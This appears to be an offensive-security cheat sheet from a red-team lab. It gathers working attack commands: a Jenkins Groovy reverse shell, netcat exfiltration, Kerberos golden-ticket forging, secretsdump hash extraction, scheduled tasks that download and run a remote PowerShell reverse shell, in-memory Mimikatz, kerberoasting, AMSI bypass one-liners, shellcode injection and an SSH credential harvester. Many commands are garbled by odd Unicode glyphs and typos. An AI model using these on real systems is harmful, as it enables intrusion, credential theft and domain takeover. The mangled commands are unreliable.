
On attacker (client):
Modify /stunnel.conf
    clien = yes
    [netcat client]
    accept = 5555
    connect = -Listening IP-:4444

On victim (listening server)
Modify /stunnel.conf
    client = no
    [ne~cat server]
    accept = 4444
    connect = 7777
C:\ nc -vlp 7777

On attacker (client):
# nc -nv 127.0.0.1 5555

Search tips on google

Parameter

Explanation

site: [url]

Search for a site [url]

numrange: [#]…[#]

Search in the numerical range

date: [ #]

Search in the last month

link: [url]

Search for pages that have a specific address

related: [url]

Search for pages related to a specific address

intitle: [string]

Search for pages that have a specific title

inurl: [string]

Search for pages that have a specific address in their url

filejpe: [xls]

Search all files with xls extension

phonebook: [name]

Search all phone books that have a specific name

Video teleconferencing tips

Polycom brand

telnet ip
#Enter 1 char, get uname:pwd
http://ip/getsecure.cgi
http://ip/er_a_rc1.htm
http://ip/a_security.htm
http://ip/a_rc.htm

Trandberg brand

http://ip/snapctrl.ssi

Sony webcam brand

http:// ip /commard/visca-gen.cgi?visca=str
8101046202FF : Freeze Camera

Convert binary to ski with perl

cat blue | perl -lpe '$_=pack"B*",$_' > bin

Review and implementation laboratory

https://htbmachines.github.io/

send mail

swaks --to receiver@mail.dev --from from@mail.dev --server mail.server.dev --body "BODY"

Sending the current file by nc

nc 10.10.10.10 3131 < output.zip

read auth clear-text credentials in nix

more /var/log/auth.log

jenkins reverse shell

1)
nc -nvlp 999

2)
Visit http://10.1.3.1:1234/script/console
String host="192.168.2.x";
int port=999;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available
()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

check linux joined ad

/etc/krb5.conf

or

"kinit -k host/$(hostname -f)"

linux ad credential stored

/var/lib/jenkins/adm_domain.keytab

Request TGT using the discovered keytab file

kinit adm_domain@OPERATIONS.ATOMIC.SITE - k - tadmin_domain. keytab
klist

Requesting CIFS ticket of Child Domain Controller

kuno cifs\/OPS-ChildDC
klist

PTH with Linux

apt -get install krb5 -user
export KRB5CCNAME =/tmp/krb5cc_123
proxychains psexec.py -k -no -pass -debug -dc -ip 10.1.1.2 adm_domain@OPS -CHILDDC

Extract the hash of adm_domain user only (with active Kerberos ticket)

proxychains secretsdump. py -no -pass -just -dc -user adm_domain -debug -dc -ip 10.1.1.2

Extract the hash OPERATIONS.ATOMIC.SITE (with active Kerberos ticket)

proxychains secretsdump. py -k -no -pass -debug -dc -ip 10.1.1.2 adm_domain@OPS -CHILDDC

Extract specify for domain SID

proxychains lookupsid.py operations/Administrator@OPS -CHILDDC -hashes aad36435b51404eeaad3b435651404ee:5984a430e639891136c949186846f24

or

$π‘ˆπ‘ π‘’π‘Ÿ = 𝑁𝑒𝑀 βˆ’ 𝑂𝑏𝑗𝑒𝑐𝑑 π‘†π‘¦π‘ π‘‘π‘’π‘š. π‘†π‘’π‘π‘’π‘Ÿπ‘–π‘‘π‘¦. π‘ƒπ‘Ÿπ‘–π‘›π‘π‘–π‘π‘Žπ‘™. π‘π‘‡π΄π‘π‘π‘œπ‘’π‘›π‘‘("π‘Žπ‘‘π‘œπ‘šπ‘–π‘","π‘˜π‘Ÿπ‘π‘‘π‘”π‘‘")
$π‘ π‘‘π‘Ÿπ‘†πΌπ· = $π‘œπ‘π‘—π‘ˆπ‘ π‘’π‘Ÿ. π‘‡π‘Ÿπ‘Žπ‘›π‘ π‘™π‘Žπ‘‘π‘’([π‘†π‘¦π‘ π‘‘π‘’π‘š. π‘†π‘’π‘π‘’π‘Ÿπ‘–π‘‘π‘¦. π‘ƒπ‘Ÿπ‘–π‘›π‘π‘–π‘π‘Žπ‘™. π‘†π‘’π‘π‘’π‘Ÿπ‘–π‘‘π‘¦πΌπ‘‘π‘’π‘›π‘‘π‘–π‘“π‘–π‘’π‘Ÿ])
$π‘ π‘‘π‘Ÿπ‘†πΌπ·.π‘‰π‘Žπ‘™π‘’π‘’

Forge a golden ticket using OPERATIONS.ATOMIC.SITE β€œkrbtgt” account

kerberos::golden /user: Administrator /domain:operations.atomic.site /sid:S-1-5-21-3757735274-1965336150-1982876978 /
krbtgt:8e268effbf6735b8fb5be206cb3dfead /sids:S-1-5-21-95921459-2896253700-3873779052-519 /ptt

Schedule a task at Atomic-DC server from OPS-CHILDDC after passing golden ticket

1)
download & edit PowerShellTcpOneLine.ps1
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1


2)
schtasks /create /S atomic -dc.atomic.site /SC Weekly /RU "NT Authority \SYSTEM" /TN "warfare" /TR "powershell. exe - 'iea Object Net.WebClient).DownloadString("'http://192.168.2.x/Invoke -PowerShellTcpOneLine.ps1')"

3)
nc -nlvp 7779


4)
schtasks /Run /S atomic-dc. atomic. site /TN "warfare"

Download & execute Invoke-Mimikatz.ps1 in memory

 (𝑁𝑒𝑀 βˆ’ 𝑂𝑏𝑗𝑒𝑐𝑑 𝑁𝑒𝑑. π‘Šπ‘’π‘πΆπ‘™π‘–π‘’π‘›π‘‘).π·π‘œπ‘€π‘›π‘™π‘œπ‘Žπ‘‘π‘†π‘‘π‘Ÿπ‘–π‘›π‘”(β€²β„Žπ‘‘π‘‘π‘://192.168.2. π‘₯/πΌπ‘›π‘£π‘œπ‘˜π‘’ βˆ’ π‘€π‘–π‘šπ‘–π‘˜π‘Žπ‘‘π‘§. 𝑝𝑠1β€²);πΌπ‘›π‘£π‘œπ‘˜π‘’ βˆ’ π‘€π‘–π‘šπ‘–π‘˜π‘Žπ‘‘π‘§ βˆ’
πΆπ‘œπ‘šπ‘šπ‘Žπ‘›π‘‘ "π‘ π‘’π‘˜π‘’π‘Ÿπ‘™π‘ π‘Ž: :π‘™π‘œπ‘”π‘œπ‘›π‘π‘Žπ‘ π‘ π‘€π‘œπ‘Ÿπ‘‘π‘ "

Psexec in ATOMIC-DC server as enterprise administrator:

π‘π‘Ÿπ‘œπ‘₯π‘¦π‘β„Žπ‘Žπ‘–π‘›π‘  𝑝𝑠𝑒π‘₯𝑒𝑐. 𝑝𝑦 βˆ’ 𝑑𝑒𝑏𝑒𝑔 βˆ’ β„Žπ‘Žπ‘ β„Žπ‘’π‘  ∢ 𝑐49927π‘Ž1𝑒𝑏5π‘Ž335𝑑𝑓𝑏681𝑑𝑏95𝑑3π‘Ž45π‘Ž2 π‘Žπ‘‘π‘œπ‘šπ‘–π‘/π΄π‘‘π‘šπ‘–π‘›π‘–π‘ π‘‘π‘Ÿπ‘Žπ‘‘π‘œπ‘Ÿ@𝐴𝑇𝑂𝑀𝐼𝐢 βˆ’ 𝐷𝐢

Enumerate named account with SPN in Nuclear.site domain

𝐼𝐸𝑋 (𝑁𝑒𝑀 βˆ’ 𝑂𝑏𝑗𝑒𝑐𝑑 𝑁𝑒𝑑. π‘Šπ‘’π‘πΆπ‘™π‘–π‘’π‘›π‘‘).π·π‘œπ‘€π‘›π‘™π‘œπ‘Žπ‘‘π‘†π‘‘π‘Ÿπ‘–π‘›π‘”(β€²β„Žπ‘‘π‘‘π‘://192.168.2.2/π‘ƒπ‘œπ‘€π‘’π‘Ÿπ‘‰π‘–π‘’π‘€_𝑑𝑒𝑣. 𝑝𝑠1β€²)
𝐺𝑒𝑑 βˆ’ π‘π‘’π‘‘π·π‘œπ‘šπ‘Žπ‘–π‘›π‘‡π‘Ÿπ‘’π‘ π‘‘ | ? {$_. π‘‡π‘Ÿπ‘’π‘ π‘‘π‘‡π‘¦π‘π‘’ βˆ’ 𝑛𝑒 ′𝐸π‘₯π‘‘π‘’π‘Ÿπ‘›π‘Žπ‘™β€²} | %{𝐺𝑒𝑑 βˆ’ π‘π‘’π‘‘π‘ˆπ‘ π‘’π‘Ÿ βˆ’ 𝑆𝑃𝑁 βˆ’ π·π‘œπ‘šπ‘Žπ‘–π‘› $_. π‘‡π‘Žπ‘Ÿπ‘”π‘’π‘‘π‘π‘Žπ‘šπ‘’}

kerberoasting

1)
𝐺𝑒𝑑 βˆ’ π‘π‘’π‘‘π·π‘œπ‘šπ‘Žπ‘–π‘›π‘‡π‘Ÿπ‘’π‘ π‘‘ | ? {$_. π‘‡π‘Ÿπ‘’π‘ π‘‘π‘‡π‘¦π‘π‘’ βˆ’ 𝑛𝑒 ′𝐸π‘₯π‘‘π‘’π‘Ÿπ‘›π‘Žπ‘™β€²} | %{𝐺𝑒𝑑 βˆ’ π‘π‘’π‘‘π‘ˆπ‘ π‘’π‘Ÿ βˆ’ 𝑆𝑃𝑁 βˆ’ π·π‘œπ‘šπ‘Žπ‘–π‘› $_. π‘‡π‘Žπ‘Ÿπ‘”π‘’π‘‘π‘π‘Žπ‘šπ‘’}

2)Enumerate accounts with SPN set in nuclear.site domain
π‘…π‘’π‘žπ‘’π‘’π‘ π‘‘ βˆ’ π‘†π‘ƒπ‘π‘‡π‘–π‘π‘˜π‘’π‘‘ βˆ’ 𝑆𝑃𝑁 𝐻𝑇𝑇𝑃/π‘›π‘’π‘π‘™π‘’π‘Žπ‘Ÿ βˆ’ 𝑑𝑐. π‘›π‘’π‘π‘™π‘’π‘Žπ‘Ÿ. 𝑠𝑖𝑑𝑒

3)
πΌπ‘›π‘£π‘œπ‘˜π‘’ βˆ’ πΎπ‘’π‘Ÿπ‘π‘’π‘Ÿπ‘œπ‘Žπ‘ π‘‘ βˆ’ π·π‘œπ‘šπ‘Žπ‘–π‘› π‘›π‘’π‘π‘™π‘’π‘Žπ‘Ÿ. 𝑠𝑖𝑑𝑒 | % { $_.π»π‘Žπ‘ β„Ž } | 𝑂𝑒𝑑 βˆ’ 𝐹𝑖𝑙𝑒 βˆ’ πΈπ‘›π‘π‘œπ‘‘π‘–π‘›π‘” 𝐴𝑆𝐢𝐼𝐼 β„Žπ‘Žπ‘ β„Žπ‘’π‘ . π‘˜π‘’π‘Ÿπ‘π‘’π‘Ÿπ‘œπ‘Žπ‘ π‘‘

4)Filter the output to include only account HASH
$𝑓𝑖𝑙𝑒 = "𝐢:\π‘ˆπ‘ π‘’π‘Ÿπ‘ \𝑃𝑒𝑏𝑙𝑖𝑐\ β„Žπ‘Žπ‘ β„Žπ‘’π‘ . π‘˜π‘’π‘Ÿπ‘π‘’π‘Ÿπ‘œπ‘Žπ‘ π‘‘"
$π‘π‘Ž = [π‘†π‘¦π‘ π‘‘π‘’π‘š. π‘–π‘œ. 𝑓𝑖𝑙𝑒]: : π‘…π‘’π‘Žπ‘‘π‘Žπ‘™π‘™π΅π‘¦π‘‘π‘’π‘ ($𝑓𝑖𝑙𝑒)
$π‘ π‘‘π‘Ÿ = [π‘†π‘¦π‘ π‘‘π‘’π‘š. π‘π‘œπ‘›π‘£π‘’π‘Ÿπ‘‘]: :π‘‘π‘œπ‘π‘Žπ‘ π‘’64π‘ π‘‘π‘Ÿπ‘–π‘›π‘”($π‘π‘Ž)

5)Decode base64 & store it in file
π‘π‘Žπ‘ π‘’64 "π‘’π‘›π‘π‘œπ‘‘π‘’π‘‘" | π‘π‘Žπ‘ π‘’64 βˆ’ 𝑑 > β„Žπ‘Žπ‘ β„Žπ‘’π‘ . π‘˜π‘’π‘Ÿπ‘π‘’π‘Ÿπ‘œπ‘Žπ‘ π‘‘

Using β€œsendemail” for transmitting email:

π‘π‘Žπ‘‘ π‘šπ‘ π‘”.𝑑π‘₯𝑑 | π‘ π‘’π‘›π‘‘π‘’π‘šπ‘Žπ‘–π‘™ βˆ’ 𝑙 π‘’π‘šπ‘Žπ‘–π‘™. π‘™π‘œπ‘” βˆ’ 𝑓 "𝑑𝑒𝑠𝑑@𝑑𝑒𝑠𝑑. π‘π‘œπ‘š" βˆ’ 𝑒 "π‘–π‘šπ‘π‘œπ‘Ÿπ‘‘π‘Žπ‘›π‘‘_π‘‘π‘’π‘™π‘–π‘£π‘’π‘Ÿπ‘¦" βˆ’ 𝑑 "a@a.com" βˆ’ 𝑠 "Title" βˆ’ π‘œ 𝑑𝑙𝑠 = π‘›π‘œ βˆ’ π‘Ž 1. π‘π‘Žt

Shell of DB-Server

π‘π‘Ÿπ‘œπ‘₯π‘¦π‘β„Žπ‘Žπ‘–π‘›π‘  π‘π‘¦π‘‘β„Žπ‘œπ‘› π‘šπ‘ π‘‘π‘Žπ‘‘. 𝑝𝑦 π‘₯π‘π‘π‘šπ‘‘π‘ β„Žπ‘’π‘™π‘™ βˆ’ 𝑠 10.1.3.2 βˆ’ 𝑝 1433 βˆ’ π‘ˆ π‘ π‘Ž βˆ’ 𝑃 β€²π‘†π΄π΄π‘‘π‘šπ‘–π‘›! @#$%β€² βˆ’ βˆ’π‘’π‘›π‘Žπ‘π‘™π‘’ βˆ’ π‘₯π‘π‘π‘šπ‘‘π‘ β„Žπ‘’π‘™π‘™ βˆ’
βˆ’π‘‘π‘–π‘ π‘Žπ‘π‘™π‘’ βˆ’ π‘₯π‘π‘π‘šπ‘‘π‘ β„Žπ‘’π‘™π‘™ βˆ’ βˆ’π‘‘π‘–π‘ π‘Žπ‘π‘™π‘’ βˆ’ π‘₯π‘π‘π‘šπ‘‘π‘ β„Žπ‘’π‘™π‘™ – π‘ β„Žπ‘’π‘™l

open cmd.exe with wordpress or …

xfreerdp x.rdp /timeout:99999 Word->File->Open cmd.exe

Abuse SMPTRAP service

𝑠𝑐 π‘žπ‘ π‘ π‘›π‘šπ‘π‘‘π‘Ÿπ‘Žp
𝑠𝑐 π‘π‘œπ‘›π‘“π‘–π‘” π‘ π‘›π‘šπ‘π‘‘π‘Ÿπ‘Žπ‘ π‘π‘–π‘›π‘π‘Žπ‘‘β„Ž = "𝑛𝑒𝑑 π‘™π‘œπ‘π‘Žπ‘™π‘”π‘Ÿπ‘œπ‘’π‘ π‘Žπ‘‘π‘šπ‘–π‘›π‘–π‘ π‘‘π‘Ÿπ‘Žπ‘‘π‘œπ‘Ÿπ‘  π‘–π‘¦π‘’π‘Ÿ /π‘Žπ‘‘π‘‘"
𝑠𝑐 π‘ π‘‘π‘œπ‘ π‘ π‘›π‘šπ‘π‘‘π‘Ÿπ‘Žπ‘
𝑠𝑐 π‘ π‘‘π‘Žπ‘Ÿπ‘‘ π‘ π‘›π‘šπ‘π‘‘π‘Ÿπ‘Žπ‘

amsi one line bypass

  1. Byte array: This method involves converting malicious code into a byte array, which bypasses AMSI inspection.

$script = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JABzAGUAcwB0AD0AIgBQAG8AdwBlAHIAcwBoAG8AcgBvAGYAIABjAG8AbgBzAGkAbwBuAHQAIABsAG8AbwAgACgAWwBJAF0AXQA6ADoARgBvAHIAbQBhAHQAZQByACkAIgA='))
$bytes = [System.Text.Encoding]::Unicode.GetBytes($script)
for ($i = 0; $i -lt $bytes.Length; $i++) {
    if (($bytes[$i] -eq 0x41) -and ($bytes[$i+1] -eq 0x6D) -and ($bytes[$i+2] -eq 0x73) -and ($bytes[$i+3] -eq 0x69)) {
        $bytes[$i+0] = 0x42; $bytes[$i+1] = 0x6D; $bytes[$i+2] = 0x73; $bytes[$i+3] = 0x69
    }
}
[System.Reflection.Assembly]::Load($bytes)
  1. Reflection: This method involves using .NET reflection to invoke a method that is not inspected by AMSI.

$amsi = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true)

or

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
  1. String obfuscation: This method involves obfuscating the malicious code to evade AMSI detection.

  2. AMSI patching: This method involves patching AMSI to bypass the inspection entirely.

  3. Using alternative PowerShell hosts: This method involves using alternative PowerShell hosts that don’t load AMSI modules.

Byte-patching:

Add-Type -MemberDefinition '
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);
' -Namespace Win32
$shellcode = [System.Text.Encoding]::UTF8.GetBytes('MY_SHELLCODE_HERE')
$mem = [Win32]::VirtualAlloc(0, $shellcode.Length, 0x1000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, [System.IntPtr]($mem), $shellcode.Length)
$thread = [Win32]::CreateThread(0, 0, $mem, 0, 0, 0)

## SSH Harvester

 https://github.com/jm33-m0/SSH-Harvester
    
 sudo ./start_sshd.sh

# in another terminal
./inject.sh

# then
ssh -p2222 user@localhost

# check what happens   

Last updated